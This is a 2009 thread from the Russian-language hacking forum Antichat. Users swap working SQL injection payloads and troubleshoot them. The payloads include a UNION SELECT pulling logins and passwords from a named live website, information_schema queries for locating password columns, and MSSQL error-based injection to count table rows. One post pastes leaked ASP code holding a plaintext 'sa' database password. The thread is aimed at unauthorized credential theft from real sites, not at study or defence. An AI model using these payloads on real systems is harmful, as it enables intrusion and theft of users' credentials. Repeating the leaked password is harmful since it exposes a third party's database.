Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

14.11.2009, 20:02
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме: 2805813
Репутация:
1396
|
|
Спайдер прав, drwxrwxrwx - не показатель, по крайней мере для AFS.
Немного теории:
К примеру такое назначение AFS ACL, как "system:anyuser r" - дает права на чтение файла любому юзеру.
Смотрятся текущие права довольно просто:
fs listacl dir_name
Устанавливаются еще проще:
fs setacl dir_name username user_rights
бла бла бла..
|
|
|

14.11.2009, 22:40
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
почему не выводит пароля и логина?
http://www.thekarchergroup.mobi/mobile-news.php?id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+tblUser--
|
|
|

14.11.2009, 22:50
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
id=-6+union+select+1,concat(User,0x20,Password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16+from+Adalet.tblUser--+
|
|
|

15.11.2009, 11:35
|
|
Новичок
Регистрация: 14.11.2009
Сообщений: 2
Провел на форуме: 7499
Репутация:
0
|
|
Сообщение от ElteRUS
Нету формы для авторизации пользователей, в админке бейсик авторизация. То какие пароли ты хочешь найти в бд ? Это просто маленький сайт какой-то фирмы для рекламы своей продукции.
Я обычно использую такой запрос для поиска актуальных таблиц
1+union+select+1,table_name,3,4+from+information_s chema.columns+where+column_name+like+0x256d61696c2 5/*
Будет произведена выборка таблиц, в которых есть столбцы, содержащие в своем имени `pass`. Так же можно поискать на `mail`, `login` ну и тп.
Спасибо Большое! +10 тебе!
Есть еще кое что. Во время ковыряния на этом сайте, на одной из страниц как то вывалилась такая ошибочка, хорошо что сохранил:
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Network=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %><% else response.write "" end if %>
|
|
|

15.11.2009, 18:08
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме: 3009843
Репутация:
204
|
|
Случайно не MSSQL? Sa- привелигированный пользователь MSSQL.
|
|
|

15.11.2009, 21:24
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
есть sqli на mssql,
надо узнать rows определенного столбца, но count() не выводит результата. Инъекция через convert(int())
как выводит результатов, данные таблицы выводится но база большая хочу узнать общее количество строк.Еще обьединеие результатов через Concat()/concat_ws()/group_concat() ошибку выдает
Последний раз редактировалось YuNi|[c; 15.11.2009 в 21:28..
|
|
|

15.11.2009, 21:34
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
count() возвращает int, поэтому необходимо преобразовать к типу varchar. Однако mssql преобразует строку обратно в число, поэтому я обычно делаю substring():
Код:
SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM information_schema.TABLES);
В запросе выше как раз есть пример конкатенации строк, для этого используется "+", методом GET необходимо использовать %2B.
Про аналог GROUP_CONCAT в MSSQL: http://raz0r.name/obzory/select-for-xml-sql-injection/
|
|
|

15.11.2009, 21:59
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
тогда запрось типа:
Код:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+count('Email')+from+tbl_Members))--
будеть
Код:
http://localhost/script.asp?id=4'+and+1=convert(int,(SELECT 1 WHERE 1=(SELECT SUBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000) FROM tbl_Members)));
правильно я понял?
|
|
|

15.11.2009, 22:36
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
|
|
|

15.11.2009, 22:43
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме: 556476
Репутация:
66
|
|
Сообщение от [Raz0r]
Нужно так:
http://localhost/script.asp?id=4'+and+1=convert(int,(select+top+1+S UBSTRING('^'+CAST(COUNT(*) AS varchar),1,1000)+from+tbl_Members))--
не погло ((
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near 'cast'.
а '^' обязательно ли
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|